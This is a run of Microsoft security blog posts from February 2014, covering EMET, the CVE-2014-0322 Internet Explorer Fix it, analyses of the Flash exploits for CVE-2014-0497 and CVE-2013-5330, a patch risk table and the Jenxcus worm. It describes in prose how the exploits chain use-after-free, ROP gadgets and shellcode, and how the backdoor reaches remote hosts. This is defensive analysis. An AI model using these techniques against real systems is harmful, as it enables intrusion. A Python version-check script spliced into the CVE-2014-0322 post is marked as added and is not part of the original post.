Your feedback both in <a href="http://social.technet.microsoft.com/Forums/en/emet/threads"><span style="color:#0563c1;">forums</span></a> and through <a href="http://www.microsoft.com/en-us/microsoftservices/support.aspx"><span style="color:#0563c1;">Microsoft Premier Support Services</span></a>, which provides enterprise support for EMET, has helped shape the new EMET capabilities to further expand the range of scenarios it addresses.</p> <p>The same goes for EMET 5.0 Technical Preview. As we march towards the final release of EMET 5.0, we would like to invite you to download the EMET 5.0 Technical Preview at <a href="http://www.microsoft.com/emet"><span style="color:#0563c1;">microsoft.com/emet</span></a> to deploy in your test environments. Your feedback is valuable in shaping our roadmap. Please <a href="http://social.technet.microsoft.com/Forums/en/emet/threads"><span style="color:#0563c1;">let us know</span></a> what you think.</p> <p>Finally, if you&rsquo;re at the RSA Conference, please stop by our booth and share your feedback with Jonathan, Chengyun, Elia and Elias. 
We&rsquo;d like to hear from you!</p> <p>Thanks,<br /><a href="http://blogs.technet.com/b/msrc/about.aspx#Chris_Betz"><span style="color:#0563c1;">Chris Betz</span></a><br /> Senior Director<br />Microsoft Security Response Center (MSRC)</p> <p>Categories: Announcements, EMET</p> <h1>The MSRT in Action: Keeping systems safe</h1> <p><a href="http://blogs.technet.com/b/mmpc/archive/2014/02/20/the-msrt-in-action-keeping-systems-safe.aspx">http://blogs.technet.com/b/mmpc/archive/2014/02/20/the-msrt-in-action-keeping-systems-safe.aspx</a><br />Fri, 21 Feb 2014 00:54:38 GMT<br />msft-mmpc</p> <p>In four days the January release of the Microsoft Malicious Software Removal Tool (MSRT) detected almost a million threats on PCs across the globe.</p> <p>In the video below, Dustin Childs and Joe Faulhaber explain what happened as the MSRT sprang into action.</p> <p><iframe width="500" height="281" src="http://www.youtube.com/embed/7gUTRuNAB0s" frameborder="0"></iframe></p> <h1>Fix it tool available to block Internet Explorer attacks leveraging CVE-2014-0322</h1> <p><a href="http://blogs.technet.com/b/srd/archive/2014/02/19/fix-it-tool-available-to-block-internet-explorer-attacks-leveraging-cve-2014-0322.aspx">http://blogs.technet.com/b/srd/archive/2014/02/19/fix-it-tool-available-to-block-internet-explorer-attacks-leveraging-cve-2014-0322.aspx</a><br />Wed, 19 Feb 2014 23:12:00 GMT<br />SRD Blog Author</p> <p>Today, we released <a href="http://technet.microsoft.com/en-us/security/advisory/2934088">Security Advisory 2934088</a> to provide guidance to customers concerned about a new vulnerability found in Internet Explorer versions 9 and 10. 
This vulnerability has been exploited in limited, targeted attacks against Internet Explorer 10 users browsing to www.vfw.org and www.gifas.asso.fr. We will cover the following topics in this blog post:</p>
<ul>
<li><span style="font-size:small;"><strong>Platforms affected</strong></span></li>
<li><span style="font-size:small;"><strong>Steps you can take to stay safe</strong></span></li>
<li><span style="font-size:small;"><strong>More details about the vulnerability</strong></span></li>
<li><span style="font-size:small;"><strong>More details about the Fix It tool</strong></span></li>
</ul>
<p><b>Platforms Affected</b></p>
<p>As described in <a href="http://technet.microsoft.com/en-us/security/advisory/2934088">Security Advisory 2934088</a>, both Internet Explorer 9 and Internet Explorer 10 contain the vulnerable code. However, we have not seen any exploit code capable of triggering the vulnerability on Internet Explorer 9. The chart below may help explain the risk by platform:</p>
<table border="1">
<tbody>
<tr> <td>&nbsp;</td> <td>Windows XP<br />Server 2003</td> <td>Windows Vista<br />Server 2008</td> <td>Windows 7<br />Server 2008 R2</td> <td>Windows 8<br />Server 2012</td> <td>Windows 8.1<br />Server 2012 R2</td> </tr>
<tr> <td>Internet Explorer 6</td> <td bgcolor="green">Not vulnerable</td> <td>n/a</td> <td>n/a</td> <td>n/a</td> <td>n/a</td> </tr>
<tr> <td>Internet Explorer 7</td> <td bgcolor="green">Not vulnerable</td> <td bgcolor="green">Not vulnerable</td> <td>n/a</td> <td>n/a</td> <td>n/a</td> </tr>
<tr> <td>Internet Explorer 8</td> <td bgcolor="green">Not vulnerable</td> <td bgcolor="green">Not vulnerable</td> <td bgcolor="green">Not vulnerable</td> <td>n/a</td> <td>n/a</td> </tr>
<tr> <td>Internet Explorer 9</td> <td>n/a</td> <td bgcolor="yellow">Vulnerable,<br />not under attack</td> <td bgcolor="yellow">Vulnerable,<br />not under attack</td> <td>n/a</td> <td>n/a</td> </tr>
<tr> <td>Internet Explorer 10</td> <td>n/a</td> <td>n/a</td> <td bgcolor="red">Under attack</td> <td bgcolor="red">Under attack</td> <td>n/a</td> </tr>
<tr> <td>Internet Explorer 11</td> <td>n/a</td> <td>n/a</td> <td bgcolor="green">Not vulnerable</td> <td>n/a</td> <td bgcolor="green">Not vulnerable</td> </tr>
</tbody>
</table>
<p><b>Steps you can take to stay safe</b></p> <p>Any of the following three protection mechanisms will protect you from exploits we have seen that leverage this vulnerability for code execution:</p> <p>1 &ndash; <a href="http://windows.microsoft.com/en-us/internet-explorer/download-ie-MCM">Upgrade to Internet Explorer 11</a></p> <p>2 &ndash; Install the <a href="http://www.microsoft.com/en-us/download/details.aspx?id=41138">Enhanced Mitigation Experience Toolkit (EMET)</a></p> <p>3 &ndash; Install the <a href="http://support.microsoft.com/kb/2934088">Fix it workaround tool</a></p> <p>Upgrading to Internet Explorer 11 is the best way to stay safe from exploit attempts targeting this vulnerability.</p> <p>The <a href="http://www.microsoft.com/en-us/download/details.aspx?id=41138">Enhanced Mitigation Experience Toolkit (EMET)</a> is also an effective way to block the targeted attacks we have analyzed. This particular exploit explicitly checks for EMET and refuses to run on any system where EMET is installed. However, even with the exploit&rsquo;s EMET check removed, the default configuration of EMET blocks the attack. In this particular case, EMET&rsquo;s EAF and Anti-Detour features block the exploit in the default EMET configuration. With EMET&rsquo;s &ldquo;Deep Hooks&rdquo; feature enabled, the MemProt, StackPivot, and CallerCheck features are each independently capable of blocking this exploit. We are pleased to see EMET continuing to provide protection for a significant portion of memory corruption exploits today. On that note, we found that in the second half of 2013, all in-the-wild exploits we encountered that leveraged memory corruption for code execution were blocked by EMET! 
We recommend that all customers install this tool. Watch next week for an announcement at the RSA Conference about the future of EMET.</p> <p>The third, and likely easiest way to protect yourself from attempts to exploit the vulnerability, is to install the Fix it workaround tool released in <a href="http://technet.microsoft.com/en-us/security/advisory/2934088">today&rsquo;s advisory</a>. You can refer to <a href="http://support.microsoft.com/kb/2934088">Knowledge Base Article 2934088</a> for complete details but simply clicking through the &ldquo;Fix It&rdquo; installer from the following link will protect your system from attempts to exploit the vulnerability:</p> <div align="center"> <table style="width:75%;" border="1" cellpadding="0"> <tbody> <tr> <td> <p align="center"><strong>Apply Fix it</strong></p> </td> <td> <p align="center"><strong>Uninstall Fix it</strong></p> </td> </tr> <tr> <td> <p align="center"><a href="http://go.microsoft.com/?linkid=9844137"><img title="Microsoft Fix it 50994" style="border:0px currentColor;" alt="Microsoft Fix it 50994" src="http://blogs.technet.com/resized-image.ashx/__size/142x54/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0574.fixit.png" /></a><br />&nbsp; <a href="http://go.microsoft.com/?linkid=9844137">Enable the CVE-2014-0322 Workaround</a></p> </td> <td> <p align="center"><a href="http://go.microsoft.com/?linkid=9844138"><img title="Microsoft Fix it 50995" style="border:0px currentColor;" alt="Microsoft Fix it 50995" src="http://blogs.technet.com/resized-image.ashx/__size/142x54/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0574.fixit.png" /></a><br />&nbsp; <a href="http://go.microsoft.com/?linkid=9844138">Uninstall the CVE-2014-0322 Workaround</a></p> </td> </tr> </tbody> </table> </div> <p>Installing the Fix it does not require a reboot but administrative privileges on the system are required. 
The Fix it installation will be effective on any Internet Explorer 9 or Internet Explorer 10 system where the most recently released security update (MS14-010) has already been installed. More specifically, the appcompat shim is enabled for the Internet Explorer process where mshtml.dll is one of the following four versions: 9.0.8112.16533, 9.0.8112.20644, 10.0.9200.16798, or 10.0.9200.20916. The eventual security update that addresses this vulnerability will ship with an incremented mshtml.dll version number, thereby automatically obsoleting this Fix it.</p> <p>You can read more about previous instances of this temporary workaround technique at <a href="http://blogs.technet.com/b/srd/archive/tags/fixit">http://blogs.technet.com/b/srd/archive/tags/fixit</a>. Fix its have been a popular mitigation technique with our customers to cover the gap between the time when an exploit appears and the time when a final, comprehensive, fully tested security update is available for wide distribution. The last instance of a Fix it tool to address an Internet Explorer vulnerability (addressed by MS13-080) was installed on 23 million computers. The most recent security-related Fix it solution mitigated an Office vulnerability that was subsequently addressed by MS13-096. That Fix it solution was installed on 57 million computers. We mention these numbers with the hope of giving you confidence that a number of your IT Pro peers are using Fix it solutions to protect their enterprise network.</p> <p><b>More details about the vulnerability and exploit</b></p> <p>CVE-2014-0322 describes an mshtml.dll use-after-free vulnerability involving the CMarkup object being accessed after it has been freed. As described above, this vulnerability is present in both Internet Explorer 9 and Internet Explorer 10, but the exploits we have seen target only 32-bit Internet Explorer 10. 
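Before going into the exploit details, here is a small version-gating check for the Fix it described above, added as an example; it is not code from the SRD post or from the Fix it tool. It takes the four mshtml.dll versions the post lists as the builds on which the shim is enabled, and shows why a host on an older build (no MS14-010) or a newer build (a later update) gets nothing from the shim. Everything beyond those four version numbers is this example's own: the status labels, the helper names, the sample inventory (host names and the non-target version strings are constructed), and the assumption that the thousands digit of the fourth version field (16xxx versus 20xxx) identifies the servicing branch, so a build is compared only against the target on its own branch.

```python
"""Version gating for the CVE-2014-0322 Fix it (appcompat shim).

Added example; not code from the SRD post or from the Fix it tool.
"""
from typing import Dict, List, NamedTuple, Tuple

Version = Tuple[int, int, int, int]

# The four mshtml.dll versions the post lists as the builds on which the
# shim is enabled (the MS14-010 builds of Internet Explorer 9 and 10).
SHIM_TARGETS: Tuple[Version, ...] = (
    (9, 0, 8112, 16533),   # Internet Explorer 9
    (9, 0, 8112, 20644),   # Internet Explorer 9
    (10, 0, 9200, 16798),  # Internet Explorer 10
    (10, 0, 9200, 20916),  # Internet Explorer 10
)


def parse_version(text: str) -> Version:
    """Parse a four-part 'a.b.c.d' file version string into a comparable tuple."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"expected a four-part version, got {text!r}")
    a, b, c, d = (int(p) for p in parts)
    return (a, b, c, d)


def servicing_branch(v: Version) -> int:
    """ASSUMPTION (this example's, not the post's): the thousands digit of the
    fourth field (16xxx vs 20xxx) identifies the servicing branch, so a build
    is only compared against the shim target on its own branch."""
    return v[3] // 1000


class FixitStatus(NamedTuple):
    ie_version: str      # "IE9", "IE10" or "other"
    shim_active: bool    # True only on an exact target build
    note: str            # what an administrator should do with this host


def fixit_status(version_text: str) -> FixitStatus:
    """Classify one mshtml.dll version against the shim's exact-match gating."""
    v = parse_version(version_text)
    ie = {9: "IE9", 10: "IE10"}.get(v[0], "other")
    if ie == "other":
        return FixitStatus(ie, False, "not IE9/IE10 mshtml.dll: the Fix it does not apply")
    if v in SHIM_TARGETS:
        return FixitStatus(ie, True, "MS14-010 build: the workaround shim is engaged")
    same_branch = [t for t in SHIM_TARGETS
                   if t[0] == v[0] and servicing_branch(t) == servicing_branch(v)]
    if not same_branch:
        return FixitStatus(ie, False, "unrecognised servicing branch: verify the build manually")
    if v < same_branch[0]:
        return FixitStatus(ie, False, "older than MS14-010: shim inert, install MS14-010 first")
    return FixitStatus(ie, False, "newer than the shim target: a later update has superseded the Fix it")


def triage_inventory(hosts: Dict[str, str]) -> Dict[str, List[str]]:
    """Group hosts by status note so the administrator sees who is actually covered."""
    grouped: Dict[str, List[str]] = {}
    for host, version in hosts.items():
        grouped.setdefault(fixit_status(version).note, []).append(host)
    return grouped


if __name__ == "__main__":
    # Constructed inventory: host names and all non-target versions are made up.
    sample = {
        "ws01": "10.0.9200.16798",
        "ws02": "10.0.9200.16750",
        "ws03": "9.0.8112.20644",
        "ws04": "11.0.9600.16000",
        "ws05": "10.0.9200.16900",
    }
    for note, names in triage_inventory(sample).items():
        print(f"{note}: {', '.join(names)}")
```

The point the grouping makes visible is that "Fix it installed" and "Fix it effective" are different questions: only the exact MS14-010 builds engage the shim, so a host that has not taken MS14-010 is still exposed with the Fix it present, and a host on a later build no longer needs it.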
The exploit was explained in greater detail on the <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html">FireEye security blog</a>. To recap, it uses JavaScript to trigger the use-after-free condition and then uses Flash to convert a write primitive into a read/write primitive that enables DEP and ASLR to be bypassed. The primitive conversion happens by redirecting a write based on a freed object&rsquo;s data (which has now been reallocated by the attacker) to corrupt a size field inside a Flash object. The corrupted size field in the Flash object is used to read and write outside of the object&rsquo;s boundary, allowing discovery of module addresses in Internet Explorer&rsquo;s address space. We are not aware of any elevation of privilege or sandbox escape vulnerability being used to &ldquo;break out&rdquo; of the Internet Explorer Protected Mode sandbox. Therefore, even after the exploit gains code execution, it still needs a non-trivial element to result in a persistent compromise of the computer.</p> <p><b>More details about the Fix it tool</b></p> <p>The Fix it redirects execution of two functions, mshtml!CMarkup::InsertElementInternal and mshtml!CMarkup::InsertTextInternal, to the code introduced by the appcompat shim. Similar changes are made in both functions. 
Let&rsquo;s take a closer look at mshtml!CMarkup::InsertElementInternal:</p>
<pre>0:020&gt; u mshtml!Cmarkup::InsertElementInternal
MSHTML!CMarkup::InsertElementInternal:
e9d3d2a500      jmp     MSHTML!SZ_HTMLNAMESPACE+0xf (66bb43c7)            // we redirect execution
0:020&gt; u 66bb43c7
MSHTML!SZ_HTMLNAMESPACE+0xf:
60              pushad                                                    // save registers
8bc8            mov     ecx,eax                                           // move the this* pointer to ecx
e818468bff      call    MSHTML!CMarkup::CLock::CLock+0x2 (664689e7)       // call into the code where we AddRef() on this CMarkup object
61              popad                                                     // restore our registers
55              push    ebp                                               // execute the code we overwrote in the jump to this shim
8bec            mov     ebp,esp
e91c2d5aff      jmp     MSHTML!CMarkup::InsertElementInternal+0x5 (661570f4) // jump back to the next instruction after our redirection point
</pre>
<p>Similar to the <a href="http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx">Fix it solution for CVE-2013-3893</a>, the shim leverages slack space near the end of mshtml.dll&rsquo;s .text section. Astute readers may notice that the appcompat shim does not introduce any code to reduce the reference count on the CMarkup object. Said another way, the appcompat shim introduces a memory leak. The memory is reclaimed when an IE tab (process) is terminated. This minor side effect of the workaround tool is harmless and of course it won&rsquo;t be present in the final comprehensive security update for this vulnerability.</p> <p><b>Acknowledgements</b></p> <p>Thanks to Richard Van Eeden, Axel Souchet, Chengyun Chu, and Elia Florio for their help triaging this vulnerability and building the Fix it workaround tool.</p> <p><b>Conclusion</b></p> <p>Please let us know if you have any questions about the risk posed by this vulnerability, the exploits we have seen leveraging the vulnerability for code execution, or mitigation opportunities available to protect your systems. 
You can email us at <a href="mailto:secure@microsoft.com">secure@microsoft.com</a> with [SRD] in the subject line. Or if you plan to attend the RSA Conference in San Francisco, CA, next week, feel free to stop by the Microsoft Booth #3005 to talk to us in person. We&rsquo;re looking forward to announcing EMET news on Tuesday morning.</p> <p>- Neil Sikka, MSRC Engineering (@neilsikka)</p> <p>Categories: 0day, fixit, Risk Assessment, Attack, EMET</p> <h1>A journey to CVE-2014-0497 exploit</h1> <p><a href="http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx">http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx</a><br />Mon, 17 Feb 2014 22:50:00 GMT<br />msft-mmpc</p> <div class="ExternalClass81D09C22098A4D24B9D1D7BFD3CC23DF"> <p>Last week we published a <a href="http://blogs.technet.com/b/mmpc/archive/2014/02/10/a-journey-to-cve-2013-5330-exploit.aspx">blog post about a CVE-2013-5330 exploit</a>. We&rsquo;ve also recently seen a new, similar attack targeting a patched Adobe Flash Player vulnerability (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0497">CVE-2014-0497</a>).</p> <p>The vulnerability related to this malware was addressed with a <a href="http://helpx.adobe.com/security/products/flash-player/apsb14-04.html">patch released by Adobe on February 4, 2014</a>. Flash Player versions 12.0.0.43 and earlier are vulnerable. We analyzed how these attacks work and found the following details.</p> <p>The malicious file has been distributed as a .swf file, which contains:</p> <ul> <li>The vulnerability trigger</li> <li>Shellcode</li> <li>A PE file (encrypted)</li> </ul> <p>The .swf file can be hosted on a web server and run when the webpage is visited. 
When the .swf is loaded, the vulnerability is triggered.</p> <p>The .swf successfully bypasses the validation of memory range and is able to access an arbitrary location.&nbsp; It overwrites a pointer in a VTABLE to successfully pass control to a controlled location (Note that the exploit does not rely on heap spray &ndash; see figure 1). The controlled location starts with stack pivot ROP gadgets built from a Flash Player DLL. The ROP gadgets call VirtualProtect() to make the shellcode memory region executable. Finally, the control is passed to the shellcode via a jmp esp instruction (as shown in figure 3).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CV1.png"><img style="height:45px;width:500px;" alt="Control transfer" src="http://www.microsoft.com/security/portal/blog-images/a/CV1.png" border="0" /></a></p> <p><em>Figure 1: Control transfer via an overwritten pointer in VTABLE</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CV2.png"><img alt="ROP gadgets" src="http://www.microsoft.com/security/portal/blog-images/a/CV2.png" border="0" /></a></p> <p><em>Figure 2: Stack pivot ROP gadgets</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CV3.png"><img style="height:233px;width:500px;" alt="Control is passed to shellcode" src="http://www.microsoft.com/security/portal/blog-images/a/CV3.png" border="0" /></a></p> <p><em>Figure 3: Control is passed to shellcode via &ldquo;jmp esp&rdquo;</em></p> <p>The shellcode simply drops a PE File (already decrypted by .swf) as %temp%\a.exe and executes it. 
The dropped PE file (Sha1: 265fdeb993a09d2350daa130de4ce5b662bed628) is detected as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDownloader:Win32/Siromost.A">TrojanDownloader:Win32/Siromost.A</a>.</p> <p>The telemetry of this exploit is shown in figure 4.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CV4.png"><img alt="Daily reports for CVE-2014-0497" src="http://www.microsoft.com/security/portal/blog-images/a/CV4.png" border="0" /></a></p> <p><em>Figure 4: Daily reports for CVE-2014-0497</em></p> <p>We have confirmed this exploit works across multiple Flash Player versions. In our lab testing, we are able to reproduce the attack on the following Adobe Flash Player versions:</p> <ul> <li>11.6.602.171</li> <li>11.6.602.180</li> <li>11.7.700.169</li> <li>11.7.700.202</li> <li>11.7.700.224</li> <li>11.8.800.94</li> <li>11.8.800.168</li> <li>11.8.800.175</li> <li>11.9.900.117</li> <li>11.9.900.152</li> <li>11.9.900.170</li> </ul> <p>Version 12.x (12.0.0.43 and earlier) is known to contain the vulnerability used by the attack, but it also carries a mitigation that prevents building the ROP gadget from the Flash Player DLL. 
The sample we analyzed does not support version 12.x for this reason.</p> <p>If you&#39;re using Flash Player version 12.0.0.43 or earlier, you need to update your Flash Player now to be protected against these attacks.</p> <p>You can also find more information about this vulnerability, including workarounds, in <a href="http://technet.microsoft.com/en-us/security/advisory/2755801">Microsoft Security Advisory (2755801)</a>.</p> <p><em>Chun Feng</em><br /><em>MMPC</em></p> </div> <h1>Assessing risk for the February 2014 security updates</h1> <p><a href="http://blogs.technet.com/b/srd/archive/2014/02/11/assessing-risk-for-the-february-2014-security-updates.aspx">http://blogs.technet.com/b/srd/archive/2014/02/11/assessing-risk-for-the-february-2014-security-updates.aspx</a><br />Tue, 11 Feb 2014 18:05:00 GMT<br />SRD Blog Author</p> <p>Today we released seven security bulletins addressing 31 unique CVEs. Four bulletins have a maximum severity rating of Critical while the other three have a maximum severity rating of Important. 
We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</p> <table border="1"> <tbody> <tr> <td><b>Bulletin</b></td> <td><b>Most likely attack vector</b></td> <td><b>Max Bulletin Severity</b></td> <td><b>Max Exploit-ability</b></td> <td><b>Likely first 30 days impact</b></td> <td><b>Platform mitigations and key notes</b></td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-010">MS14-010</a> <p>(Internet Explorer)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Addresses both memory corruption vulnerabilities and elevation of privilege vulnerabilities in a single package.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-011">MS14-011</a> <p>(VBScript)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>The single CVE addressed by this bulletin is included in MS14-010 for IE9 users. Customers with IE9 installed need not deploy MS14-011.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-007">MS14-007</a> <p>(DirectWrite)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Internet Explorer is vector to this vulnerability in&nbsp;DirectWrite.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-005">MS14-005</a> <p>(MSXML)</p> </td> <td>Victim browses to a malicious website to be exposed to this information leak vulnerability.</td> <td>Important</td> <td>3</td> <td>Vulnerability first seen as ASLR bypass mechanism in targeted attacks during November 2013. 
May see attacks again begin using this again as details emerge.</td> <td>As discussed in the <a href="http://blogs.technet.com/b/srd/archive/2013/11/12/technical-details-of-the-targeted-attack-using-cve-2013-3918.aspx">SRD </a>and <a href="http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html">FireEye </a>blogs during November 2013, this vulnerability was used along with another vulnerability in active attacks. The MS13-090 security update completely blocked all attacks described by those blog posts.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-009">MS14-009</a> <p>(.NET Framework)</p> </td> <td>Most likely to be exploited vulnerability involves attacker initiating but not completing POST requests to ASP.NET web application, resulting in resource exhaustion denial of service.</td> <td>Important</td> <td>1</td> <td>Resource exhaustion attacks involving CVE-2014-0253 already in progress in the wild.</td> <td>CVE-2014-0253 addresses resource exhaustion &ldquo;<a href="http://en.wikipedia.org/wiki/Slowloris">Slowloris</a>&rdquo; attack. <p>CVE-2014-0257 addresses sandbox escape vulnerability invoving com objects running code out-of-process.</p> <p>CVE-2014-0295 addresses the vsab7rt.dll ASLR bypass described at<a href="http://www.greyhathacker.net/?p=585"> http://www.greyhathacker.net/?p=585</a>.</p> </td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-008">MS14-008</a> <p>(Forefront Protection for Exchange)</p> </td> <td>Code is unlikely to be reachable. However, if attackers do find a way, it would involve a malicious email message being processed by the Forefront Protection for Exchange service.</td> <td>Critical</td> <td>2</td> <td>Unlikely to see exploits developed targeting this vulnerability.</td> <td>While this vulnerability&rsquo;s attack vector appears attractive (email), the vulnerability is unlikely to be reachable. 
It was discovered internally by code analysis and we have not been successful in developing a real-world vulnerability trigger. We address it via security update out of an abundance of caution.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-006">MS14-006</a> <p>(IPv6)</p> </td> <td>Attacker on the same subnet as victim (IPv6 link-local) sends large number of malicious router advertisements resulting in victim system bugcheck.</td> <td>Important</td> <td>3</td> <td>Denial of service only.</td> <td>This bugcheck is triggered by a watchdog timer on the system, not due to memory corruption. Affects Windows RT, Windows Server 2012 (not R2), and Windows 8 (not 8.1).</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC</p><div style="clear:both;"></div> MSRT February 2014 - Jenxcushttp://blogs.technet.com/b/mmpc/archive/2014/02/11/msrt-february-2014-jenxcus.aspxTue, 11 Feb 2014 17:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e130694d-5d2f-4868-abf0-0008001e6074msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/02/11/msrt-february-2014-jenxcus.aspx#comments<p>We have been seeing a lot more VBScript malware in recent months, thanks in large part to <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Worm:VBS/Jenxcus#tab=1">VBS/Jenxcus</a>. Jenxcus is a worm coded in VBScript that is capable of propagating via removable drives. Its payload opens a backdoor on an infected machine, allowing it to be controlled by a remote attacker. For the past few months we have seen the number of affected machines remain consistently high. 
For this reason we have included Jenxcus in the February release of the Microsoft <a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx">Malicious Software Removal Tool</a> (MSRT).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Jen1.png"><img style="height:272px;width:500px;" alt="Jenxcus machine infections" src="http://www.microsoft.com/security/portal/blog-images/a/Jen1.png" border="0" /></a></p> <p><em>Figure 1: Jenxcus machine infections October 2013 &ndash; January 2014</em></p> <p>Although Jenxcus is not very complex malware, it seems to be successful in taking advantage of social engineering attacks, where the malicious script file is commonly bundled with other programs. When the program bundle is executed, Jenxcus runs silently in the background. We have seen these bundled programs hosted on certain websites and also seeded in some torrent files.</p> <p>Figure 2 shows an example of a spoofed YouTube site (take note that this is a fake YouTube site) that can be used to attack users of social media services such as Facebook and Twitter by luring them to watch a video. When attempting to play the video, the site serves a fake Flash Player update which is bundled with Jenxcus.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Jen2.png"><img style="height:355px;width:500px;" alt="Jenxcus is bundled with a fake Flash Player" src="http://www.microsoft.com/security/portal/blog-images/a/Jen2.png" border="0" /></a></p> <p><em>Figure 2: Jenxcus is bundled with a fake Flash Player update on a fake video hosting site</em></p> <p>Another reason why Jenxcus is affecting a large number of machines is its worm capability, which propagates via removable drives. If a removable drive is found on the infected machine, most Jenxcus variants create a shortcut&nbsp;that uses the same name as personal files found on the drive. 
The shortcut points to a copy of the malware, and thus users can be caught off-guard by thinking&nbsp;the shortcut link points to&nbsp;a trusted clean file. As shown in Figure 3, when the shortcut link is run it will silently execute <em>Servieca.vbs</em> in the background while also playing <em>my song.mp3</em> to avoid any suspicion from the user.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Jen3.png"><img alt="the shortcut link also runs Servieca.vbs" src="http://www.microsoft.com/security/portal/blog-images/a/Jen3.png" border="0" /></a></p> <p><em>Figure 3: When the shortcut link is run it will also silently execute Servieca.vbs</em></p> <p>Jenxcus also has backdoor capabilities: it connects to a host which provides it with commands to execute. The host is usually hardcoded into the worm. Most of the host sites use <em>no-ip.org</em> to avoid being easily traced.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Jen4.png"><img alt="Jenxcus uses no-ip.org as its host" src="http://www.microsoft.com/security/portal/blog-images/a/Jen4.png" border="0" /></a></p> <p><em>Figure 4:&nbsp; Jenxcus uses no-ip.org as its host</em></p> <p>The latest variants of Jenxcus are now typically obfuscated to evade easy detection. Figure 5 shows an example of how an obfuscated Jenxcus variant looks.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Jen5.png"><img style="height:225px;width:500px;" alt="Obfuscated Jenxcus variant" src="http://www.microsoft.com/security/portal/blog-images/a/Jen5.png" border="0" /></a></p> <p><em>Figure 5: An obfuscated Jenxcus variant</em></p> <p>In this particular example, the obfuscator inserted a combination of random garbage numbers and characters in between the code. 
Removing this would leave decimal values that, when converted to ASCII characters, would reveal the original code.</p> <p>Given the tricks and evasion techniques employed by Jenxcus, we recommend you run up-to-date, real-time antimalware software and enable scanning on removable drives.</p> <p>Being vigilant with your clicks and downloads will also help prevent Jenxcus and other threats from getting inside your system.</p> <p><em>Francis Allan Tan Seng and Ferdinand Plazo</em><br /><em>MMPC</em></p><div style="clear:both;"></div> A journey to CVE-2013-5330 exploithttp://blogs.technet.com/b/mmpc/archive/2014/02/10/a-journey-to-cve-2013-5330-exploit.aspxMon, 10 Feb 2014 22:40:05 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e8178ed9-cf7d-45f8-9740-fed177703843msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/02/10/a-journey-to-cve-2013-5330-exploit.aspx#comments<p>Recently, we&#39;ve seen a few attacks in the wild targeting a patched Adobe Flash Player vulnerability (<a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5330">CVE-2013-5330</a>). This vulnerability was addressed with a <a href="https://www.adobe.com/au/support/security/bulletins/apsb13-26.html">patch released by Adobe</a> on November 12, 2013. On the Windows platform, Flash Player version 11.9.900.117 and earlier are vulnerable.</p> <p>We had a chance to analyze how the attacks work and noted some interesting details from our investigation.</p> <p>The malicious file has been distributed as a .swf file obfuscated with secureSWF, and it has been designed as a &ldquo;one-stop&rdquo; attack. 
It contains the vulnerability&rsquo;s trigger, the heap spray and shellcode, and an encrypted PE file (see figure 1).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CVE1.png"><img alt="malicious .swf file" src="http://www.microsoft.com/security/portal/blog-images/a/CVE1.png" border="0" /></a></p> <p><em>Figure 1: The malicious .swf file</em></p> <p>This .swf exploit can be hosted on a web server and run when the webpage is visited. When the .swf is loaded, the vulnerability is triggered. The .swf successfully bypasses the memory range validation and is able to access arbitrary locations. It builds a deliberately crafted VTABLE (figure 2) and uses it to pass control to a controlled location, which contains the &ldquo;Shim&rdquo; code (a small piece of code that runs before the shellcode is executed), as shown in figure 3.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CVE2.png"><img style="height:263px;width:500px;" alt="Crafted VTABLE" src="http://www.microsoft.com/security/portal/blog-images/a/CVE2.png" border="0" /></a></p> <p><em>Figure 2: Crafted VTABLE for control transfer</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CVE3.png"><img style="height:223px;width:500px;" alt="Shim code" src="http://www.microsoft.com/security/portal/blog-images/a/CVE3.png" border="0" /></a></p> <p><em>Figure 3: The &ldquo;Shim&rdquo; code</em></p> 